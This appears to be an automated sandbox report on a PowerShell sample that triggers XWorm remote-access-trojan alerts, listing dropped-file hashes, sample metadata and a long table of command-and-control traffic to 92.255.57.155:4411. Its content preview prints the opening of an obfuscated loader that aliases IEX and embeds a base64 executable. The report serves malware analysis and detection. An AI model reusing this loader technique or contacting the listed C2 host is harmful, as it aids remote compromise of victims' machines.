SHA-512: | 2A17EE1B2447745E37F842DA22C35139C15D631159179992B47D498472C12F1247A6FB54791E2AF3CFED8A3E9EC56E737BA0EC998B74017849AB51E791BFCC82 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 385553 |
Entropy (8bit): | 3.3576009797663233 |
Encrypted: | false |
SSDEEP: | 3072:HjEBH8cvI+4uEq6cKxWLTgezeymxBn43MNsglVQHQ+:HjgHHJ4VYTgTy6KqVQw |
MD5: | E56A4614A662E28146885ABB23FED56F |
SHA1: | 32C5E4888DE16CFBB2FB0F069E2E26B17F27403D |
SHA-256: | C198035F419A72F58D0F0EC4A775D0E9EE7534929E6A40CFC2805D60637DE483 |
SHA-512: | B714F87E36ECD29C05C9AB5876C63D68E77DD2995F8EEF9C4A667E16E3033510F3193C8EA300EE7E7A764E104ABF6EBB4B9ED6DD20C832D1B9A38589E4D96EB3 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8360 |
Entropy (8bit): | 3.689361290662274 |
Encrypted: | false |
SSDEEP: | 192:R6l7wVeJ0h6R6Y2IS4ugmfZ8SprK89bn8sf9ONm:R6lXJi6R6YRSRgmfOcnPf9V |
MD5: | 9B2D7B74123825F8A32EE938C867E8FA |
SHA1: | FFC93F7D0BF39A10DAC48212BCEFA27127068C4D |
SHA-256: | F145810735061CAC3083B893E9063EFAF4067034EE10D73E04347E31E33098CF |
SHA-512: | AABEA0B8C5DDF616428A11AF441F67054B484A83E654F4388A26D0581765085BEE31121E12E2B2ABE5C68EEE5D9595DF1FEE9B3E2C4E2D88B47D12631B8CF8DE |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4728 |
Entropy (8bit): | 4.444708844389835 |
Encrypted: | false |
SSDEEP: | 48:cvIwWl8zsUJg77aI9u5WpW8VYBYm8M4J3cFn+q8vYYmDI8d:uIjfSI7QI7VdJuKXmDI8d |
MD5: | 42D53AD1A68E986974950AA9479A6688 |
SHA1: | E0B20720A3E000C5B2F8C982233CCB790177E9F2 |
SHA-256: | C4DEB110259CC36DB117C56E172D4ECC3396D6CB641382751C19D4E1EC8680F1 |
SHA-512: | 858F1EB1EB5FD3BB768ABB8A253215A079671A01F1D7A16D5489BF6177ACF6DEB2F4C436BFEC4C47739A79981B3D14EECF6482CF22D6159C65C130B9EF5D30F2 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.720960520022621 |
Encrypted: | false |
SSDEEP: | 48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW |
MD5: | 3DBF5EEA8FCA26371DD771A5E2DB41B1 |
SHA1: | D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48 |
SHA-256: | DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6 |
SHA-512: | F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QSACXR4DH9JRFG2F74VT.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.720960520022621 |
Encrypted: | false |
SSDEEP: | 48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW |
MD5: | 3DBF5EEA8FCA26371DD771A5E2DB41B1 |
SHA1: | D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48 |
SHA-256: | DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6 |
SHA-512: | F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.466344622931147 |
Encrypted: | false |
SSDEEP: | 6144:3IXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSb+:4XD94QWlLZMM6YFHl++ |
MD5: | AEAA3F38568B1100D534ECC4F8A9FF10 |
SHA1: | 34DD4AD387F6209BF05D5A3C9222643CB393281E |
SHA-256: | 37BC7A72782B787515C5FEB12FCBC261612D3BEE453FABEA99903356DC7A7C67 |
SHA-512: | 1BE2828D2E02FFA907144174CC9693290FB303AF83DDCF0639ED3E8182C7441501BD0C5BC6F2540D6D1A11C3648B82D259F739E3114765F67F5D013BD78C9658 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.189067791033469 |
TrID: | |
File name: | 92.255.57.155.ps1 |
File size: | 333'029 bytes |
MD5: | f555029ba45bc9f18b451066721785c8 |
SHA1: | 930ea2fb160b84b3fd841aebd5a462896eccd400 |
SHA256: | d6e3fbc61a201ac72495e59f7f2f3967e2ecf11f54675618a17b2ab4986e6f8b |
SHA512: | 33312f8bf6abba5c02a6f9ed5464c64c57656f6b747049c68dc67052dca31ace0c631c4cbbb4351944c081d8a70bc49db6da835562149305749f28d984213b3e |
SSDEEP: | 6144:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLID5uzynrKMk8kRJs9Skjugiwuz/vVnich:nGYvUcJrk6TKW |
TLSH: | 44642C318804B91FCEEF1F87B5002FD27C79257BDF591018A98F16B96A68238597AF70 |
File Content Preview: | ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-29T09:49:16.109200+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:16.560934+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:16.610128+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:29.301964+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:29.301964+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:30.464963+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:30.466737+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:44.402294+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:44.404637+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:58.404895+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:58.406885+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:49:59.328119+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:03.029819+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:03.047504+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:03.964582+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.172071+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.245200+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.292081+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.364800+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.455341+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.484146+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.667286+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.786671+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:04.814163+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.950315+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:05.692558+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:05.714918+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:05.902574+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:05.913851+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:06.044909+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:06.060632+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:06.869260+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.000734+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.045873+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.120152+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.256110+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.379455+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.379532+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.540764+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:07.569545+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.660213+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:08.464730+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.473940+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:08.675163+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.803911+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.887654+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.913204+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:09.043552+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:09.163558+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:09.622287+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:10.074005+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.085689+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:10.417934+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.715280+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.868985+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.944601+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:10.967271+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:11.520798+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:11.597885+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:11.611605+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:11.760592+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:12.549466+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.759741+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.783218+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:12.874435+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.879169+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.089706+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.092410+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.204806+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.215338+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.342990+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.347191+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.414813+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.508742+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:13.545363+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.630052+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.605324+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.664090+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.815830+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.817332+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:14.874751+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.980694+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:15.026044+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:15.106876+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:15.147035+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:15.228324+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:16.090356+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.527221+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.737455+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.796176+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.796283+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:16.856975+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.067356+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.195385+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.405988+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.476686+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:17.529253+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.639428+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
